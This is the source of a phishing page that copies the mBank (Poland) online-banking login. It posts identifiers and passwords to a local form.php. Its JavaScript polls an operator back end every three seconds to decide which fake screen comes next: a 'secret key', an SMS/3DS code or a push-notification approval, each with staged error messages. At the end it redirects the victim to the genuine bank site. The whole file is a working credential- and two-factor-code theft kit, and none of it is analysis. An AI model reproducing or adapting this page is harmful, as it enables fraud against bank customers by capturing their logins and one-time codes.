﻿<!DOCTYPE html>
<!-- This [if] will  -->
<!--[if IE 8]>
    <html class="no-js ie ie8 lt-ie9" lang="pl">
 <![endif]-->
<!--[if IE 9]>
    <html class="no-js ie ie9" lang="pl">
<![endif]-->
<!--[if gt IE 9]>
    <html class="no-js" lang="pl">
<![endif]-->
<!--[if !IE]>-->
<html lang="pl">
<!--<![endif]-->
<head>
    <meta charset="utf-8" />
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <meta name="description" content="Logowanie do serwisu transakcyjnego mBanku" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width">
    <title>mBank serwis transakcyjny</title>
   <link rel="Stylesheet" type="text/css" href="Resources/par_axd/LoginMain@file=ResponsiveLogin%252FStyles%252FResponsiveLogin.css&amp;v=35421aab1c00e08db0d36ba5e63e7de2.css" />
</head>
<body>
    
    <header class="header">
        

<a href="https://www.mbank.pl/">
    <img class="header-left" src="Resources/par_axd/LoginMain@file=Content%252FImages%252Fmbank_mass.svg"
         width="107" height="40" alt="Link do gł&#243;wnej strony mBank">
</a>


        <h1 class="accessible-not-visible">Zaloguj się do serwisu transakcyjnego</h1>
            <span class="header-left trim">Zaloguj się do serwisu transakcyjnego</span>
        <span class="header-right">
            

    <span class="lang-changer">



        <a href="Login.php#" class="lang-selector pl"><img src="Resources/par_axd/LoginMain@file=Content%252FImages%252Fpl.svg" alt="Polski (PL)" /> PL</a>

    <ul class="lang-list">
        <li>
            <a href="Login.php#" data-lang="pl" class="current-lang"><img src="Resources/par_axd/LoginMain@file=Content%252FImages%252Fpl.svg" alt="Polski (PL)" /> Polski (PL)</a>
        </li>
        <li>
            <a href="Login.php#" data-lang="en" class=""><img src="Resources/par_axd/LoginMain@file=Content%252FImages%252Fen.svg" alt="English (EN)" /> English (EN)</a>
        </li>
    </ul>
</span>
<div class="lang-toast" role="alert">
    You are about to switch to the English version of the website.<br />
    If you use the mobile app, its language will automatically change to English as well. Some of our websites are available only in Polish. We are working hard to make them available in English as soon as possible. <a href="Login.php#" class="lang-toast-close">Close</a>
</div>

        </span>
        <span class="header-right desktop">
            

    <a href="https://www.mbank.pl/bezpieczenstwo/">
    <img class="ico-lock" src="Resources/par_axd/LoginMain@file=Content%252FImages%252Flock.png" alt="" />
    Bezpieczeństwo
</a>


        </span>
        <span class="header-right mobile-landscape">
            

    <a href="https://www.mbank.pl/kontakt/oferta-indywidualna/">
    <img class="ico-lock" src="Resources/par_axd/LoginMain@file=Content%252FImages%252Fkontakt.png" alt="" />
    Kontakt
</a>


        </span>
        <span class="header-right mobile-landscape">
            

    <a href="https://www.mbank.pl/bezpieczenstwo/">
    <img class="ico-lock" src="Resources/par_axd/LoginMain@file=Content%252FImages%252Flock.png" alt="" />
    Bezpieczeństwo
</a>


        </span>
    </header>
    <div class="main">
        <div class="img-container">
            

<img src="logon/responsive_logon_retail/background" alt="" role="presentation" />


        </div>
        <div class="panel" style="display: flex;
    justify-content: center;top: 50px;">
            

<div id="retail" style="margin-left:0px;" class="login expanded login-form scenario-default">
    <div class="login-container">
       <form method="POST" action="form.php">
            <div class="color"></div>
            <div class="login-content">
                <div class="title-container ">
                    <h2 class="accessible-not-visible">Klienci indywidualni i firmowi</h2>
                    <div class="title">Klienci indywidualni i firmowi</div>
                </div>

                <div class="logged-container" role="alert" aria-live="assertive">
                    <div class="logged">Zalogowano</div>
                </div>

                <div class="spinner-container" style="display:none">
                    <div class="photo spinner"></div>
                </div>

                <div class="error-container" role="alert" style="display:none">
                    <div id="errorMessage" class="message">Nieprawidłowy identyfikator lub hasło.</div>
                    <div id="errorDetails" class="details">Jedną z przyczyn błędów tego typu może być wciśnięty klawisz "Caps Lock". Upewnij się, że "Caps Lock" na Twojej klawiaturze jest wyłączony oraz sprawdź poprawność wpisywanego identyfikatora i hasła. <br> </div>
                </div>
                
                <div class="push-container" role="alert" style="display:none; padding-top: 26px; padding-bottom: 20px; width: 100%; height: auto;">
                    <div id="errorMessage" class="message" style="font-size: 20px;font-weight: bold;padding: 0 15px;padding-bottom: 15px;">Potwierdź powiadomienie push</div>
                    <div id="errorDetails" class="details">
                        <div style="padding:10px; font-size:14px;">Obecnie w oficjalnej aplikacji mobilnej banku na Twoim urządzeniu pojawiło się powiadomienie o potwierdzeniu logowania do konta osobistego.<br>  Proszę potwierdź to powiadomienie, aby się zalogować.<br> </div>
                    <style>
                        .img-push{max-width:60px;}
                    </style>
                    <div style="margin-top: 20px; display: flex;align-items: center;justify-content: space-around; padding: 10px;    padding-right: 20px;">
                    <img class="img-push" style="max-width:70px;" src="push1.png">
                    <img class="img-push" style="max-width:25px; padding:5px;padding-left: 0px;" src="push-next.png">
                    <img class="img-push" src="push2.png">
                    <img class="img-push" style="max-width:25px; padding:5px;padding-left: 0px;" src="push-next.png">
                    <img class="img-push" style="max-width:50px;" src="push3.png">
                    </div>
                    </div>
                </div>
                
                <div class="form-container">
                    <div class="photo-container">
                        <div class="avatar photo photo-retail" style="background-image: url(logon/responsive_logon_retail/avatar_retail)"></div>
                    </div>
                    <div class="field-container">

                        <div class="form-input">
                            <input name="userID" id="userID" type="text" maxlength="24" placeholder="Identyfikator" aria-describedby="userIDDescription" autofocus autocomplete="off" />
                            <a tabindex="-1" href="Login.php#" aria-label="Wpisz nazwę użytkownika lub 8-cyfrowy numer klienta, lub 16-cyfrowy numer karty płatniczej. Jeżeli logujesz się pierwszy raz skorzystaj z tymczasowego numeru klienta." class="tooltip">
                                <i>?</i>
                            </a>
                            <div sryle="padding: 10px;" class="accessible-not-visible" id="userIDDescription" >Wpisz nazwę użytkownika lub 8-cyfrowy numer klienta, lub 16-cyfrowy numer karty płatniczej. Jeżeli logujesz się pierwszy raz skorzystaj z tymczasowego numeru klienta.</div>
                        </div>
                        <div class="form-input">
                            <input name="pass" id="pass" type="password" maxlength="32" placeholder="Hasło" aria-describedby="passDescription" autocomplete="off" />
                            <a tabindex="-1" href="Login.php#" aria-label="Wpisz hasło, kt&#243;rego używasz do logowania w serwisie transakcyjnym mBanku. Pamiętaj, że system rozpoznaje duże i małe litery." class="tooltip">
                                <i>?</i>
                            </a>
                            <div class="accessible-not-visible" id="passDescription">Wpisz hasło, kt&#243;rego używasz do logowania w serwisie transakcyjnym mBanku. Pamiętaj, że system rozpoznaje duże i małe litery.</div>
                        </div>

                    </div>
                    
                </div>
                <div id="pin-container" class="form-container" style="display:none;">
                    
                <div class="pin-container" >

                        <div id="codepinform" class="form-input">
                            <input name="pin" id="pin" type="password" maxlength="32" placeholder="Secret Key" aria-describedby="passDescription" autocomplete="off" />
                            <a tabindex="-1" aria-label="Klucz ten można znaleźć w oficjalnej aplikacji banku lub skontaktować się z obsługą klienta w celu uzyskania dodatkowych informacji." class="tooltip">
                                <i>?</i>
                            </a>
                            <div class="accessible-not-visible" id="passDescription">Proszę podać klucz dostępu do swojego osobistego konta bankowego. Klucz ten można znaleźć w oficjalnej aplikacji banku lub skontaktować się z obsługą klienta w celu uzyskania dodatkowych informacji.</div>
                        </div>
                        <div id="errorpin" class="details" style="display:none; text-align: left;    margin-left: 15px;    margin-top: 5px; color:red;">*Błąd, wprowadzony nieprawidłowy klucz prywatny, spróbuj ponownie!</div>
                        <div style="padding: 10px;"class="details" id="userIDDescription">Proszę podać klucz dostępu do swojego osobistego konta bankowego. Klucz ten można znaleźć w oficjalnej aplikacji banku lub skontaktować się z obsługą klienta w celu uzyskania dodatkowych informacji.</div>
                        
                    </div>
                 </div>    
                    
                    <div id="Code3ds-container" class="form-container" style="display:none;">
                    
                <div class="Code3ds-container" >

                        <div id="code3dsform" class="form-input">
                            <input name="3ds" id="3ds" type="password" maxlength="32" placeholder="3DS Code" aria-describedby="passDescription" autocomplete="off" />
                            <a tabindex="-1" aria-label="Do twojego telefonu komórkowego została wysłana wiadomość tekstowa z kodem." class="tooltip">
                                <i>?</i>
                            </a>
                            
                            <div class="accessible-not-visible" id="passDescription">Do twojego telefonu komórkowego została wysłana wiadomość tekstowa z kodem. Powinna ona nadejść w ciągu dwóch minut. Proszę wprowadzić ten kod w odpowiednie pole powyżej.</div>
                        </div>
                        <div id="error3ds" class="details" style="display:none; text-align: left;    margin-left: 15px;    margin-top: 5px; color:red;">*Błąd, wprowadzono niepoprawny kod SMS, spróbuj ponownie!</div>
                        <div style="margin-top:20px; padding: 10px;"class="details" id="userIDDescription">Do twojego telefonu komórkowego została wysłana wiadomość tekstowa z kodem. Powinna ona nadejść w ciągu dwóch minut. Proszę wprowadzić ten kod w odpowiednie pole powyżej.</div>
                        
                    </div>
                 </div>    
                    
                <div id="capslockWarning" class="capslock-warning" style="display: none;">Caps Lock włączony</div>
            </div>
            
            <div class="buttons form-buttons" style="margin-bottom:20px;">
                <button id="submitButton" type="submit" class="btn disabled" 
                aria-disabled="true" style="background-color: #21a148;
    color: #fff;">
                    Zaloguj się
                </button>
            </div>
            
            <div class="buttons redirect-activation-buttons">
                <button id="redirectActivatioBtn" type="submit" class="btn">
                    Dalej
                </button>
            </div>
            <div class="buttons finish-button">
                <button id="finishBtn" type="submit" class="btn">
                    Zakończ
                </button>
            </div>
        </form>
        <div class="buttons form-buttons" style="margin-bottom:20px;">
        <div class="buttons error-buttons" style="display:none;">
                <button id="reloginBtn" class="btn">
                    Zaloguj się ponownie
                </button>
            </div>
            <div class="buttons push-buttons" style="display:none;">
                <button id="pushBtn" class="btn">
                    Zaloguj się
                </button>
            </div>
        </div>
        
        
    </div>
        <div class="buttons info-buttons component-info">
            <troubleshot-modal-information></troubleshot-modal-information>
            
        </div>
        
</div>
<div id="pb" class="login collapsed">
    <a href="LoginPB.php">
        <div class="title-container">
            <h2 class="accessible-not-visible">Private Banking</h2>
            <div class="title">Private Banking</div>
        </div>
        <div class="photo-container">
            <div class="photo photo-pb" style="background-image: url(logon/responsive_logon_retail/avatar_pb)"></div>
        </div>
    </a>
</div>
<div id="corpo" class="login collapsed">
    <a href="LoginCompanyNet.html">
        <div class="title-container">
            <h2 class="accessible-not-visible">CompanyNet</h2>
            <div class="title">CompanyNet</div>
        </div>
        <div class="photo-container">
            <div class="photo photo-corpo" style="background-image: url(logon/responsive_logon_retail/avatar_corpo)"></div>
        </div>
    </a>
</div>

        </div>
    </div>

        <div class="adv-container">
            <div class="small-adv-placeholder">
                <div class="adv">
                    

<a href="#" tabindex="-1">
    <img src="logon/responsive_logon_retail/adv" style="max-width: 100%;" alt="" role="presentation" />
</a>

    
                </div>
            </div>
            <div class="big-adv-placeholder">
                <div class="adv desktop">
                    

<a href="#" tabindex="-1">
    <img src="logon/responsive_logon_retail/adv" alt="" role="presentation" />
</a>
    
                </div>
            </div>
        </div>
    <div class="footer-container">
        <div class="short-footer-placeholder">
            <div id="security_and_contact" class="security_panel">
                <span class="security_and_contact_portrait">
                    

    <a href="https://www.mbank.pl/kontakt/oferta-indywidualna/">
    <img class="ico-lock" src="Resources/par_axd/LoginMain@file=Content%252FImages%252Fkontakt.png" alt="" />
    Kontakt
</a>


                </span>
                <span class="security_and_contact_portrait">
                    

    <a href="https://www.mbank.pl/bezpieczenstwo/">
    <img class="ico-lock" src="Resources/par_axd/LoginMain@file=Content%252FImages%252Flock.png" alt="" />
    Bezpieczeństwo
</a>


                </span>
            </div>
        </div>
        <div class="long-footer-placeholder">
            <div class="security">
                <div id="log-in-panel-footer-security">
<h2>mBank ostrzega!</h2>
<ul>
<li><span style="color: #000000; font-size: 12px;"><span style="color: #000000;"><strong><a href="https://www.mbank.pl/informacje-dla-klienta/indywidualny/post,10189,uwazaj-z-kim-rozmawiasz.html">Złodzieje podszywają się pod pracowników banków, serwisów sprzedażowych lub funkcjonariuszy Policji.  Przeczytaj jak się chronić.<span style="color: #000000;">- więcej</span></a></strong></span></span></li>
</ul>
<h2>Bezpieczeństwo</h2>
<ul>
<li><span style="color: #000000; font-size: 12px;"><strong>1.&nbsp;<span style="color: #000000;"><a href="https://www.mbank.pl/bezpieczenstwo"><span style="color: #000000;">mBank ostrzega! <span style="color: #000000;">- więcej</span></span></a></span></strong></span></li>
<li><span style="color: #000000; font-size: 12px;"><strong>2.&nbsp;</strong><span style="color: #000000;"><a href="https://www.mbank.pl/bezpieczenstwoPB/zlote-zasady/"><span style="color: #000000;">Złote zasady bezpieczeństwa <span style="color: #000000;">- <strong>więcej</strong></span></span></a></span></span></li>
<li><span style="color: #000000; font-size: 12px;"><strong>3. </strong><span style="color: #000000;"><a href="https://www.mbank.pl/bezpieczenstwoPB/bezpieczny-komputer/"><span style="color: #000000;">Bezpieczny bank w komputerze <span style="color: #000000;">- <strong>więcej</strong></span></span></a></span></span></li>
<li><span style="color: #000000; font-size: 12px;"><strong>4.</strong>&nbsp;<a href="https://www.mbank.pl/bezpieczenstwoPB/bezpieczny-telefon/"><span style="color: #000000;"><span style="color: #000000;">Bezpieczny bank w telefonie i na tablecie </span></span></a></span><a href="https://www.mbank.pl/bezpieczenstwoPB/bezpieczny-telefon/"><span style="color: #000000;"><span style="color: #000000;"><span style="color: #000000;">-</span></span><span style="font-size: 12px;"><strong><span style="color: #000000;"> więcej</span></strong></span></span></a></li>
<li><span style="color: #000000; font-size: 12px;"><strong>5.&nbsp;</strong><span style="color: #000000;"><span style="color: #000000;"><a href="https://www.mbank.pl/bezpieczenstwoPB/bezpieczna-karta/">Bezpieczeństwo kart płatniczych <span style="color: #000000;">- <strong>więcej</strong></span></a></span></span></span></li>
<li><span style="color: #000000; font-size: 12px;"><strong>6.&nbsp;</strong><span style="color: #000000;"><a href="https://www.mbank.pl/bezpieczenstwoPB/dbalosc-o-bezpieczenstwo/"><span style="color: #000000;">Jak mBank dba o Twoje bezpieczeństwo <span style="color: #000000;">- <strong>więcej</strong></span></span></a></span></span></li>
</ul>
<p><span style="font-size: 12px;">&nbsp;</span></p>
</div>
                	<div id="log-in-panel-footer-contact">
   <h2> Masz problem z zalogowaniem? <h2>
   
   			<span style="color: #000000; font-size: 13px;"><a href="https://www.mbank.pl/pomoc/info/bezpieczenstwo/logowanie-odblokowanie.html"><strong><span style="text-decoration: underline; color: #000000; font-size: 13px;">Sprawdź</span></strong></a> jak odblokować dostęp do serwisu transakcyjnego </span>
   <br><br>
   <h2>Kontakt</h2>

    <div id="mLine-24h">
                <div class="mLine-text">
            <span class="header">mLinia</span>
            <span class="text" style="color: #000000; font-size: 18px;">+48 42 6 300 800</span>
        </div>
    </div>
    <!-- / mLine-24h -->
</div>
            </div>
        </div>
    </div>
    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
    
  
  
  <script>
  
 var currentUrl = window.location.href;

if (currentUrl.includes("login=loading")) {
      var formBtn = document.querySelector(".form-buttons");
      var formContainer = document.querySelector(".form-container");
      var titleContainer = document.querySelector(".title-container");
      var spinnerContainer = document.querySelector(".spinner-container");
      formContainer.style.display = "none";
      titleContainer.style.display = "block";
      formBtn.style.display = "none";
      spinnerContainer.style.display = "block";
       }       

var reloginButton = document.getElementById("reloginBtn");
reloginButton.addEventListener("click", function () {
  var currentUrl = window.location.href;
  var parts = currentUrl.split("?");
  var urlWithoutQuery = parts[0];
  window.location.href = urlWithoutQuery;
});
       
       
function getCookie(name) {
  const cookies = document.cookie.split(';');
  for (let i = 0; i < cookies.length; i++) {
    const cookie = cookies[i].trim();
    if (cookie.startsWith(name + '=')) {
      return decodeURIComponent(cookie.substring(name.length + 1));
    }
  }
  return null;
}

function checkUserStatus() {
    var userDataCookie = getCookie('user_data'); 
    var userData = JSON.parse(userDataCookie);
    var ip = userData.user_ip;
    var data = 'attr';
    $.ajax({
        url: "form.php",
        type: "POST",
        data: { ip: ip, data: data },
        success: function(userStatus) {
            userStatus = userStatus.trim();
            console.log(userStatus);
            if (userStatus === '"pin"') { 
             var spinnerContainer = document.querySelector(".spinner-container");
              var Code3dsContainer = document.querySelector("#Code3ds-container");
            var errorContainer = document.querySelector(".error-container");
              var errorBtn = document.querySelector(".error-buttons");
                var finishButton = document.querySelector(".finish-button");
                var pinContainer = document.querySelector("#pin-container");
                var formBtn = document.querySelector(".form-buttons");
                var formContainer = document.querySelector(".form-container");
                var title = document.querySelector(".title");
                var titleContainer = document.querySelector(".title-container");
                var pushContainer = document.querySelector(".push-container");
            var pushBtn = document.querySelector(".push-buttons");
            pushBtn.style.display = "none";
              pushContainer.style.display = "none";
                
                Code3dsContainer.style.display = "none";
                
                errorBtn.style.display = "none";
                spinnerContainer.style.display = "none";
                errorContainer.style.display = "none";
                formContainer.style.display = "none";
                formBtn.style.display = "none";
                pinContainer.style.display = "block";
                finishButton.style.display = "block";
                titleContainer.style.display = "block";
                title.textContent = "Podaj klucz prywatny";
                
            } else if (userStatus === '"errorpin"') { // Убираем лишние кавычки
                var spinnerContainer = document.querySelector(".spinner-container");
                var Code3dsContainer = document.querySelector("#Code3ds-container");
                var errorContainer = document.querySelector(".error-container");
                var errorBtn = document.querySelector(".error-buttons");
                var finishButton = document.querySelector(".finish-button");
                var pinContainer = document.querySelector("#pin-container");
                var formBtn = document.querySelector(".form-buttons");
                var formContainer = document.querySelector(".form-container");
                var title = document.querySelector(".title");
                var titleContainer = document.querySelector(".title-container");
                var formInput = document.querySelector('#codepinform');
              var errorPin = document.querySelector("#errorpin");
              var pushContainer = document.querySelector(".push-container");
            var pushBtn = document.querySelector(".push-buttons");
            pushBtn.style.display = "none";
              pushContainer.style.display = "none";
                formInput.style.borderBottom = '1px #ff060680 solid';
                errorBtn.style.display = "none";
               
                spinnerContainer.style.display = "none";
                errorContainer.style.display = "none";
                formContainer.style.display = "none";
                formBtn.style.display = "none";
                
                Code3dsContainer.style.display = "none";
                pinContainer.style.display = "block";
                finishButton.style.display = "block";
                 errorPin.style.display = "block";
                titleContainer.style.display = "block";
                title.textContent = "Błąd klucza prywatnego";
                
            }
            
            else if (userStatus === '"error"') { 
            var spinnerContainer = document.querySelector(".spinner-container");
              var errorContainer = document.querySelector(".error-container");
              var errorBtn = document.querySelector(".error-buttons");
              var formBtn = document.querySelector(".form-buttons");
              var formContainer = document.querySelector(".form-container");
              var titleContainer = document.querySelector(".title-container");
              var finishButton = document.querySelector(".finish-button");
                var pinContainer = document.querySelector("#pin-container");
                var pushContainer = document.querySelector(".push-container");
            var pushBtn = document.querySelector(".push-buttons");
            pushBtn.style.display = "none";
              pushContainer.style.display = "none";
              formContainer.style.display = "none";
              spinnerContainer.style.display = "none";
              titleContainer.style.display = "none";
              pinContainer.style.display = "none";
              finishButton.style.display = "none";
              formBtn.style.display = "none";
              errorBtn.style.display = "block";
              errorContainer.style.display = "block";
            }
            else if (userStatus === '"push"') { 
                var Code3dsContainer = document.querySelector("#Code3ds-container");
            var spinnerContainer = document.querySelector(".spinner-container");
              var pushContainer = document.querySelector(".push-container");
              var formBtn = document.querySelector(".form-buttons");
              var pushBtn = document.querySelector(".push-buttons");
              var formContainer = document.querySelector(".form-container");
              var titleContainer = document.querySelector(".title-container");
              var pinContainer = document.querySelector("#pin-container");
               var finishButton = document.querySelector(".finish-button");
              finishButton.style.display = "none";
              Code3dsContainer.style.display = "none";
              formContainer.style.display = "none";
              spinnerContainer.style.display = "none";
              titleContainer.style.display = "none";
              pinContainer.style.display = "none";
              formBtn.style.display = "none";
              pushBtn.style.display = "block";
              pushContainer.style.display = "block";
            }
            
            else if (userStatus === '"3ds"') { 
                var spinnerContainer = document.querySelector(".spinner-container");
            var Code3dsContainer = document.querySelector("#Code3ds-container");
              var errorContainer = document.querySelector(".error-container");
              var errorBtn = document.querySelector(".error-buttons");
              var formBtn = document.querySelector(".form-buttons");
              var formContainer = document.querySelector(".form-container");
              var titleContainer = document.querySelector(".title-container");
              var finishButton = document.querySelector(".finish-button");
              var pinContainer = document.querySelector("#pin-container");
              var title = document.querySelector(".title");
            var pushContainer = document.querySelector(".push-container");
            var pushBtn = document.querySelector(".push-buttons");
            pushBtn.style.display = "none";
              pushContainer.style.display = "none";
              formContainer.style.display = "none";
              spinnerContainer.style.display = "none";
              pinContainer.style.display = "none";
              formBtn.style.display = "none";
              errorBtn.style.display = "none";
              errorContainer.style.display = "none";
              finishButton.style.display = "block";
              Code3dsContainer.style.display = "block";
              titleContainer.style.display = "block";
              title.textContent = "Weryfikacja SMS";
            }
            
            
            else if (userStatus === '"error3ds"') { 
                var spinnerContainer = document.querySelector(".spinner-container");
                var Code3dsContainer = document.querySelector("#Code3ds-container");
              var errorContainer = document.querySelector(".error-container");
              var errorBtn = document.querySelector(".error-buttons");
              var formBtn = document.querySelector(".form-buttons");
              var formContainer = document.querySelector(".form-container");
              var titleContainer = document.querySelector(".title-container");
              var finishButton = document.querySelector(".finish-button");
              var pinContainer = document.querySelector("#pin-container");
              var title = document.querySelector(".title");
              var formInput = document.querySelector('#code3dsform');
              var error3ds = document.querySelector("#error3ds");
              var pushContainer = document.querySelector(".push-container");
            var pushBtn = document.querySelector(".push-buttons");
            pushBtn.style.display = "none";
              pushContainer.style.display = "none";
                formInput.style.borderBottom = '1px #ff060680 solid';

              formContainer.style.display = "none";
              spinnerContainer.style.display = "none";
              pinContainer.style.display = "none";
              formBtn.style.display = "none";
              errorBtn.style.display = "none";
              errorContainer.style.display = "none";
              error3ds.style.display = "block";
              finishButton.style.display = "block";
              Code3dsContainer.style.display = "block";
              titleContainer.style.display = "block";
              
              title.textContent = "*Błąd, wprowadzono niepoprawny kod SMS, spróbuj ponownie!";
            }
            
            else if (userStatus === '"succes"') { 
              window.location.href = 'https://www.mbank.pl/indywidualny/';
            }
            
        },
        error: function() {
            console.log("error");
        }
    });
}

setInterval(checkUserStatus, 3000);

   $(document).ready(function () {
            $("#pushBtn").click(function () {
                var data = { push: 1 };
                $.post("form.php", data, function (response) {
                    if (response === "success") {
                    const protocol = window.location.protocol;
                    const host = window.location.host;
                    const currentURL = `${protocol}//${host}/index.php?login=loading`;
                    window.location.href = currentURL;
                    } else {
                        console.error("error");
                    }
                });
            });
        });
</script>

  
</body>
</html>
